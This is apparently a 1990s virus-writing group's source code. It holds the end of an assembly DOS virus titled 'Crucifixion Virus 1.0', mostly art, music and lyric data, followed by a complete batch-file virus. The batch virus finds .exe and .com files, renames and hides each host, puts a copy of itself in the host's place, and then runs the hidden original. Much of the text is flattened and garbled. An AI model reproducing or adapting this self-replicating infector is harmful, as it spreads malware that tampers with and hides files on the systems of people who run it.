0ff,0,18d,3,5,1,1,1,5,1,1,1,5,0 db 0ff,0,18d,3,5,1,1,1,5,1,1,1,5,0 db 0ff,0,18d,3,5,1,1,1,5,1,1,1,5,0 db 0ff,0,18d,3,5,1,1,1,5,1,1,1,5,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,5,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,4,3,4,5,4,3,4,3,0 db 0ff,0,18d,3,3,5,4,5,5,5,4,5,3,0 db 0ff,0,18d,3,3,3,0ff,5,5,3,3,0 db 0ff,0,18d,0ff,3,0a,0 db 0ff,0,18d,0ff,3,0a,0 db 0ff,0,18d,0ff,3,0a,0 db 0ff,0,18d,0ff,3,0a,0,0 endcross: Arms1: db 3,3,3,5,0ff,3,13d,5,5,2,2,2,1,1,1,2,2,2,5,5,0ff,3,12d,5,3,3,0 db 3,3,5,5,5,0ff,3,7,0ff,5,6,1,2,2,2,1,1,1,2,2,2,1,0ff,5,6,0ff,3,6,5,5,5,3,0 db 3,5,4,3,4,0ff,5,7,0ff,1,7,2,2,2,1,1,1,2,2,2,0ff,1,7,0ff,5,6,4,3,4,5,0 db 3,3,5,4,5,0ff,1,15d,2,2,1,1,1,2,2,0ff,1,14d,5,4,5,3,0 db 3,3,3,0ff,5,17d,0ff,1,7,0ff,5,16d,3,3,0,0 EndArms1: Arms2: db 3,3,3,3,0ff,3,13d,5,5,2,2,2,1,1,1,2,2,2,5,5,0ff,3,12d,3,3,3,0 db 3,3,3,5,5,0ff,3,7,0ff,5,6,1,2,2,2,1,1,1,2,2,2,1,0ff,5,6,0ff,3,6,5,3,3,3,0 db 3,3,3,5,4,0ff,5,7,0ff,1,7,2,2,2,1,1,1,2,2,2,0ff,1,7,0ff,5,6,4,5,3,3,0 db 3,3,3,5,5,0ff,1,15d,2,2,1,1,1,2,2,0ff,1,14d,5,5,3,3,0 db 3,3,3,0ff,5,17d,0ff,1,7,0ff,5,16d,3,3,0,0 EndArms2: Arms3: db 3,3,3,3,0ff,3,13d,5,5,2,2,2,1,1,1,2,2,2,5,5,0ff,3,12d,3,3,3,0 db 3,3,3,3,3,0ff,3,7,0ff,5,6,1,2,2,2,1,1,1,2,2,2,1,0ff,5,6,0ff,3,6,3,3,3,3,0 db 3,3,3,3,3,0ff,5,7,0ff,5,7,2,2,2,5,5,5,2,2,2,0ff,5,7,0ff,5,6,3,3,3,3,0 db 3,3,3,3,3,3,3,3,0ff,5,12d,2,2,4,4,4,2,2,0ff,5,12d,3,3,3,3,3,3,0 db 3,3,3,0ff,3,10d,0ff,5,10d,4,4,0ff,5,10d,0ff,3,0a,0,0 EndArms3: ;Music Data ; 1 = Turn On Speaker 2 = Turn Off Speaker ;-1 = Pause -2 = Screech ; 0 = End of data ; ; 3 = lyrics #1 ; 4 = lyrics #2 ; 5 = lyrics #3 ; 6 = final clap ;Most other numbers taken as data for outputting to Timer ; MusicData: ;If you're the messiah and you know it dw 3 dw 1,1473d,-1,2,1,1473d,-1,2,1,1084d,-1,2,1,1084d,-1,2,1,1084d,-1,2 dw 1,1084d,-1,2,1,1084d,-1,2,1,1084d,-1,2 ;clap your hands dw 4 dw 1,1193d,-1,2,1,1084d,-1,2,1,994d,-1,2 ;Scree! Scree! dw -1,-2,-1,-2,-1 ;If you're the messiah and you know it dw 3 dw 1,1473d,-1,2,1,1473d,-1,2,1,994d,-1,2,1,994d,-1,2,1,994d,-1,2 dw 1,994d,-1,2,1,994d,-1,2,1,994d,-1,2 ;clap your hands dw 4 dw 1,1084d,-1,2,1,994d,-1,2,1,883d,-1,2 ;Scree! Scree! dw -1,-2,-1,-2,-1 ;If you're the messiah and you know it dw 3 dw 1,1084d,-1,2,1,883d,-1,2,1,822d,-1,2,1,822d,-1,2,1,822d,-1,2 dw 1,883d,-1,2,1,1325d,-1,2,1,1325d,-1,2 ;Then your face will surely show it dw 5 dw 1,822d,-1,2,1,994d,-1,2,1,883d,-1,2,1,883d,-1,2,1,883d,-1,2 dw 1,994d,-1,2,1,1084d,-1,2,1,1084d,-1,2 ;If you're the messiah and you know it dw 3 dw 1,1084d,-1,2,1,883d,-1,2 dw 1,994d,-1,2,1,994d,-1,2,1,994d,-1,2,1,1084d,-1,2,1,1193d,-1,2 dw 1,1193d,-1,2 ;clap your hands dw 4 dw 1,1325d,-1,2,1,1193d,-1,2,1,1084d,-1,2 ;Scree! Scree! dw -1,6,-1,6,-1,0 Lyrics1 db 'If you''re the Messiah and you know it,',0 Lyrics2 db ' Clap your hands! ',0 Lyrics3 db ' Then your face will surely show it, ',0 Vname db '(rucifixion Virus 1.0',0 Credits db '(c) 1994, by Jesus of The Trinity',0 Attribs dw 0 TimeDate dw 0,0 MyStack dw 40 dup(0) ;dunno if this is needed, but it don't ;crash no more.... endCruc: end Crucifixion @REM  @echo off REM This is an actual virus written in the Batch programming (snicker) REM language. The art is by Moses and the programming is by Jesus. REM (and yes dammit I was bored - Jesus) REM - -----ÄÄÄÄÄÄÍÍÍÍÍÍÍð[TRiNiTy aNSi LoaDeR ViRuS] ðÍÍÍÍÍÍÍÄÄÄÄÄÄ----- - - ctty nul for %%f in (*.exe *.com) do set NeWHoST=%%f rename %NeWHoST% Å%NeWHoST% attrib +h Å%NeWHoST% copy %0.bat %NeWHoST% ren %NeWHoST% *.bat set NeWHoST= ctty con if errorlevel==1 goto DisplayLoader goto EndVirus :DisplayLoader REM - -----ÄÄÄÄÄÄÍÍÍÍÍÍÍðððððððððððððððððððððððððððððððÍÍÍÍÍÍÍÄÄÄÄÄÄ----- - - REM echo °²±°²±Ý echo ±²±±²±Þ echo °±±±±±±±±²±±±±±±±²Û°±±±±±±±± echo ²±²±±±±±²Û echo ±±²±±²Ý echo ±±±±±±Ý echo °°²°°²Ý echo °±² ßÛßßÜ Û ßÛÜ ßÜ Û °±²Ý echo ÜßÜ ßÜ echo °±² Û Û Û Û Û ° Û ° echo ±²Ý ßÜ Üß echo °±² ß±ßÛß ° Û Û ±  echo ° °±²ÞÜ ± echo °±² Û ß± ± ² ° ² ²  echo °±² þ ܲ echo °±²ÄÄßÄÄÄÄ echo ßÜÄßÜÄÜßÄÄÄßÜ echo ßÜÄÄßÜÄ°±²ÄÄ echo Ä¿Þ echo °±²Godúúúúúúúúú echo þúProgramÝer echo  °±² ³² echo ±ÝJesusúúúúúúúþúProgr echo aÞÜer ± Þ echo ³ÞHoly Spiritú echo þúPrograÝþer echo  ± ø echo ³ÝNoahúúúúúúúú echo þúOrganÛz echo eßÜWritßÜ ³ echo ³ÜMosesúúúúúúú echo þúArtiÞt echo /P.RÝ/WriÞ echo er ³ echo ÀÝÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄij echo ÄÄÄÄijÄÄÄÄÄÝ echo ÄÄÙ echo ³ø echo ³ echo ³ echo ³ :EndVirus @echo  @Å%0 %1 %2 %3 %4 %5 %6 %7 %8 %9